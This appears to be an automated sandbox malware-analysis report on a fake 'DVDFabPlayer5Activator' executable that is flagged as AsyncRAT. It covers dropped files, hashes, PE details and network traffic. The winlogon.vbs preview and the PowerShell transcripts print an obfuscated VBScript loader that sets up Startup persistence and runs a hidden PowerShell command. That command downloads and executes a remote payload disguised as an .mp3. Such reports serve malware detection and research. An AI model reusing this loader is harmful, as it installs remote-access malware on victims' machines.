SHA-256:	F08AA6C8B9F5931CFFF0E2ECB22C93EA177930D23EC213C1F683CE8467A49CEC
SHA-512:	54E0F518C87902F3953FA00D0A4DFAE655AD13BC50FB02D5777186E3AB09BA4DAAD67DD5FE09F6DB098E1907E95156C3B27EC08F80BDB3FC2ED0CC11A9F7C84B
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 26%, Browse Antivirus: ReversingLabs, Detection: 41%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&.DXG..XG..XG..C...mG..C....G..Q? .^G..Q?$.YG..Q?0.EG..XG...F..C.=.OG..C...sG..C.9.YG..C.>.YG..RichXG..........PE..d.....M`..........#............................@.....................................P........@.............................................,...,........-.......x...................................................................................................text............................... ..`.rdata..............................@..@.data............P..................@....pdata...x.......z...0..............@..@text.....%...@...&..................@.. data.....n...p...p..................@..@.rsrc....-...........@..............@..@........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\PDbZT Download File
Process:	C:\Users\user\Desktop\xuXIetZvv6.exe
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:DPhaYG:jMr
MD5:	D7E5C89164E02323E6F23511DE2B9EEC
SHA1:	95AD25D859D304621B9DF59A61982E1C7237E6C0
SHA-256:	4E856E249F7CD6D8D3C6056FC225BB4AE888827B99B1E72CD902B2BDD55D3F55
SHA-512:	F40625479F066EE6179A4292FF89B6D6365221628CA395C225CAF2D1BB8BAC974F55D9F9C33EBB49B47828840D00AFEFBAFB5715F3B35E53C4CF852EDEC2B816
Malicious:	false
Preview:	.......->.......

C:\Users\user\AppData\Roaming\winlogon.vbs Download File
Process:	C:\Users\user\Desktop\xuXIetZvv6.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1607
Entropy (8bit):	5.688632869348016
Encrypted:	false
SSDEEP:	24:eu5rqaqDuH46zJajAtwn6U+uJ2z+fLAW7xmWAWSHtyQKnr6MfMG3zrqESYKn7kOd:euqp6zAgMrXUYLAGoHTKWMkyXjlm
MD5:	95433F3A8DE55D26DDF7864FE9CDE527
SHA1:	2F10DD935C890E89ABFC16E9D959CA6163FD8BB6
SHA-256:	F63C9B2F961F0242F3D00D453A880DF93C944125A57BB82942913A4527E5DE49
SHA-512:	32FDD2B102F6A3DFE13A9FCB985B62B195B0EB0815959FC4D9CE3817451DA2D0B03ECF4D186409694F0B49842E84207E638FC838C90009D39A1CC822451D4334
Malicious:	true
Yara Hits:	Rule: Molerats_Jul17_Sample_5, Description: Detects Molerats sample - July 2017, Source: C:\Users\user\AppData\Roaming\winlogon.vbs, Author: Florian Roth Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\winlogon.vbs, Author: Joe Security
Preview:	const CONSOLE_HIDE=0..const CONSOLE_SHOW=1..const CMD_WAIT=true..Dim objShell..Set objShell = CreateObject("WScript.Shell")..set oShell1 = wscript.createObject("WScript.Shell")..fl=Wscript.scriptfullname..sn=Wscript.scriptname..C=chr(30+30+5+5+10) &"owershell -ExecutionPolicy Bypass -windowstyle hidden -Command "..objShell.Run C & chrw(34) & "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\"&sn&"',[System.IO.File]::ReadAllText('"&fl&"'))" & Chrw(34),0,false....oShell1.run chr(30+30+5+5+10) +"owershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa", CONSOLE_HIDE, CMD_WAIT....Dim shell,com..sLPgPFAyS=chr(80) +"ow"

C:\Users\user\Documents\20210418\PowerShell_transcript.813435.luK6XcC1.20210418100233.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.323470864916863
Encrypted:	false
SSDEEP:	24:BxSA3V3yDvBBSx2DOXUWxNAIWmHjeTKKjX4CIym1ZJXf7NAZdOnxSAZDdq:BZkv/SoOUrmqDYB1ZMgZZg
MD5:	E1A4CC7072CFD8A6F7B7DBFCF480097E
SHA1:	745A5073E4F386F4563299181EC2FE44F8D63975
SHA-256:	EE5042BB14404EA6E8E62B3B5A1ACEDA0C2747AA01610E435165C63E3E344502
SHA-512:	C1AE8D86BFADC33D7CD6AACBA84F5C9A4B5801B82845F8DA1A948E536A161F4C0B6FB682337B978CEE418E821CFB9061B2BFC2AC9107249EC11F9DDA56076A43
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210418100234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813435 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command [System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))..Process ID: 6888..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210418100234..********************..PS>[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::R

C:\Users\user\Documents\20210418\PowerShell_transcript.813435.qzMzuKsn.20210418100234.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1451
Entropy (8bit):	5.455190936170652
Encrypted:	false
SSDEEP:	24:BxSA3V3yDvBBSx2DOXUWD6U+uJ2z+fLAW7xmWAWbWpHjeTKKjX4CIym1ZJXfd4+m:BZkv/SoOjrXUYLAG0pqDYB1ZMXUYLAGV
MD5:	3357ED21E757CDF148489CBA86CE8AB3
SHA1:	4508E09742F2A2A24190DF831605C0E66C571CBC
SHA-256:	A5325857FF4B39195388833B4F3D58BCE65052AA288694373D19D0B7026062BA
SHA-512:	D552EC68560C73E016214654E5DB68C0B3CC3AE891F7BC4E434A26885A7B9C073C2996E255BFF9957B09083CC3C3461A3554B6AB35AFD0D5D445614FBA9C9314
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210418100234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813435 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa..Process ID: 6920..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..********

\Device\Null Download File
Process:	C:\Windows\System32\cacls.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	121
Entropy (8bit):	4.323081947925383
Encrypted:	false
SSDEEP:	3:ohAIQDMCZArMsxo2xRSvFFwIFMW3Gtvn:ohYD+82xmwIyHtv
MD5:	43B1EC1407EA9C0219A563FFFEEAE780
SHA1:	C42041802E99A95E6CBAE13E3E20EBFBA3237BB2
SHA-256:	7E5146BF6F0B6AA61AFD4E3A6031D6DEF0F37523A22D75086B8E0E21D22E4B16
SHA-512:	5307D7E089BEA4DAC250D0B606C80DF13CCA0A7ECB622BF61B37AD736FFC44EA68F9B993E4743F2AB220FF950E9D9B423524D4E10C0B2D1CE280A7D9B5095DE0
Malicious:	false
Preview:	C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:F .. BUILTIN\Administrators:F ....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.442319874773565
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	xuXIetZvv6.exe
File size:	1953792
MD5:	200cb4b34ea0e61fe8454731bf7a107a
SHA1:	a6121f8f7d8600c2278e90d5ae622c9b2d3b410b
SHA256:	3deec916d94fabdc65168ebd8b5f072a702781064d13b10700d9a52998a669a3
SHA512:	62c947626012a18c3a4644ff24909b1c2a3a427b1df4529139eb54bb74da12b5299aca0070d4b0deee168098ea7474207868644e82917bdbf130797f1676fe99
SSDEEP:	49152:jssWIfbHO+7DGBtAJSKBw3NMuykVtknnfSYVIW+cC31ciF:jsxIfbItAPBw3NMxkKnfZic
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ukw`................................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	7bb999c9a5a3e2c0

Static PE Info

General
Entrypoint:	0x5b17be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60776B75 [Wed Apr 14 22:23:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1b176c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1b2000	0x2d400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1af7c4	0x1af800	False	0.459890213101	data	6.37305156632	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x1b2000	0x2d400	0x2d400	False	0.67196672134	data	6.70469068862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1e0000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x1b26b0	0x2e8	data
RT_ICON	0x1b2998	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x1b2ac0	0xea8	data
RT_ICON	0x1b3968	0x8a8	data
RT_ICON	0x1b4210	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x1b4778	0x11a58	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x1c61d0	0x10828	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x1d69f8	0x4228	data
RT_ICON	0x1dac20	0x25a8	data
RT_ICON	0x1dd1c8	0x10a8	data
RT_ICON	0x1de270	0x988	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x1debf8	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1df060	0xae	data
RT_VERSION	0x1b2340	0x370	data
RT_MANIFEST	0x1df110	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright Q8j3aQDlyYCozHx5l 2021
Assembly Version	4.95.51.95
InternalName	DVDFabPlayer5Activator.exe
FileVersion	89.98.19.62
CompanyName	H
Comments	v
ProductName	lLeese4K4
ProductVersion	89.98.19.62
FileDescription	nH2znt0CT0XjIbA
OriginalFilename	DVDFabPlayer5Activator.exe

Static AutoHotKey Info

General
Code:

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/18/21-10:02:34.110389	TCP	2030673	ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)	87	49715	46.1.54.174	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2021 10:02:22.693896055 CEST	49709	77	192.168.2.5	46.1.54.174
Apr 18, 2021 10:02:22.798126936 CEST	77	49709	46.1.54.174	192.168.2.5
Apr 18, 2021 10:02:22.798305988 CEST	49709	77	192.168.2.5	46.1.54.174
Apr 18, 2021 10:02:22.799725056 CEST	49709	77	192.168.2.5	46.1.54.174
Apr 18, 2021 10:02:22.980007887 CEST	77	49709	46.1.54.174	192.168.2.5
Apr 18, 2021 10:02:26.241413116 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.311201096 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.311292887 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.340373039 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.410212994 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.410413027 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.410444021 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.410635948 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.410732031 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.410748959 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.410893917 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.412724018 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.448878050 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.517966986 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.551194906 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.625613928 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625655890 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625678062 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625696898 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625719070 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625742912 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625766039 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625773907 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.625787973 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625790119 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.625811100 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625833035 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.625876904 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.625886917 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.625889063 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.695614100 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.695640087 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.695652962 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.695667982 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.695785999 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.695804119 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.696388960 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.696405888 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.696660995 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.697144032 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.697163105 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.697352886 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.697706938 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.697729111 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.697813034 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.698373079 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.698393106 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.698606968 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.698720932 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.698741913 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.698759079 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.698776007 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.698792934 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.698815107 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.698828936 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.698853970 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.698887110 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.699155092 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.699279070 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.699454069 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.764410973 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.764445066 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.764467955 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.764552116 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.764559031 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.764611959 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.766704082 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.766743898 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.766921043 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.767601967 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.767632961 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.767807961 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.767844915 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.767869949 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.767894030 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.767919064 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.767935038 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.767942905 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.767966032 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.767990112 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.768151045 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.768258095 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.768284082 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.768929958 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.768963099 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.769114017 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.769543886 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.769572973 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.769685030 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.769701004 CEST	49711	443	192.168.2.5	144.76.38.100
Apr 18, 2021 10:02:26.770212889 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.770241022 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.770889044 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.770915985 CEST	443	49711	144.76.38.100	192.168.2.5
Apr 18, 2021 10:02:26.771492958 CEST	49711	443	192.168.2.5	144.76.38.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2021 10:02:05.996876955 CEST	52212	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:06.045754910 CEST	53	52212	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:06.749304056 CEST	54302	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:06.816958904 CEST	53	54302	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:06.854332924 CEST	53784	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:06.904743910 CEST	53	53784	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:06.960553885 CEST	65307	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:06.974982023 CEST	64344	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:07.009222984 CEST	53	65307	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:07.016336918 CEST	62060	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:07.032943010 CEST	53	64344	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:07.066075087 CEST	53	62060	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:08.112724066 CEST	61805	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:08.172588110 CEST	53	61805	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:08.944063902 CEST	54795	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:08.992938995 CEST	53	54795	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:09.698405027 CEST	49557	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:09.760036945 CEST	53	49557	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:10.076909065 CEST	61733	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:10.128443003 CEST	53	61733	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:10.954236031 CEST	65447	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:11.008074045 CEST	53	65447	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:12.717607021 CEST	52441	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:12.768982887 CEST	53	52441	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:13.775068998 CEST	62176	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:13.829205990 CEST	53	62176	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:14.757906914 CEST	59596	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:14.806507111 CEST	53	59596	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:15.985796928 CEST	65296	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:16.038629055 CEST	53	65296	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:21.584991932 CEST	63183	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:21.633873940 CEST	53	63183	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:24.008750916 CEST	60151	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:24.059894085 CEST	53	60151	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:26.154083014 CEST	56969	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:26.220257998 CEST	53	56969	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:34.374066114 CEST	55161	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:34.432250977 CEST	53	55161	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:35.075324059 CEST	54757	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:35.155970097 CEST	53	54757	8.8.8.8	192.168.2.5
Apr 18, 2021 10:02:43.649827957 CEST	49992	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:02:43.698565960 CEST	53	49992	8.8.8.8	192.168.2.5
Apr 18, 2021 10:03:06.820816040 CEST	60075	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:03:06.881640911 CEST	53	60075	8.8.8.8	192.168.2.5
Apr 18, 2021 10:03:15.015882969 CEST	55016	53	192.168.2.5	8.8.8.8
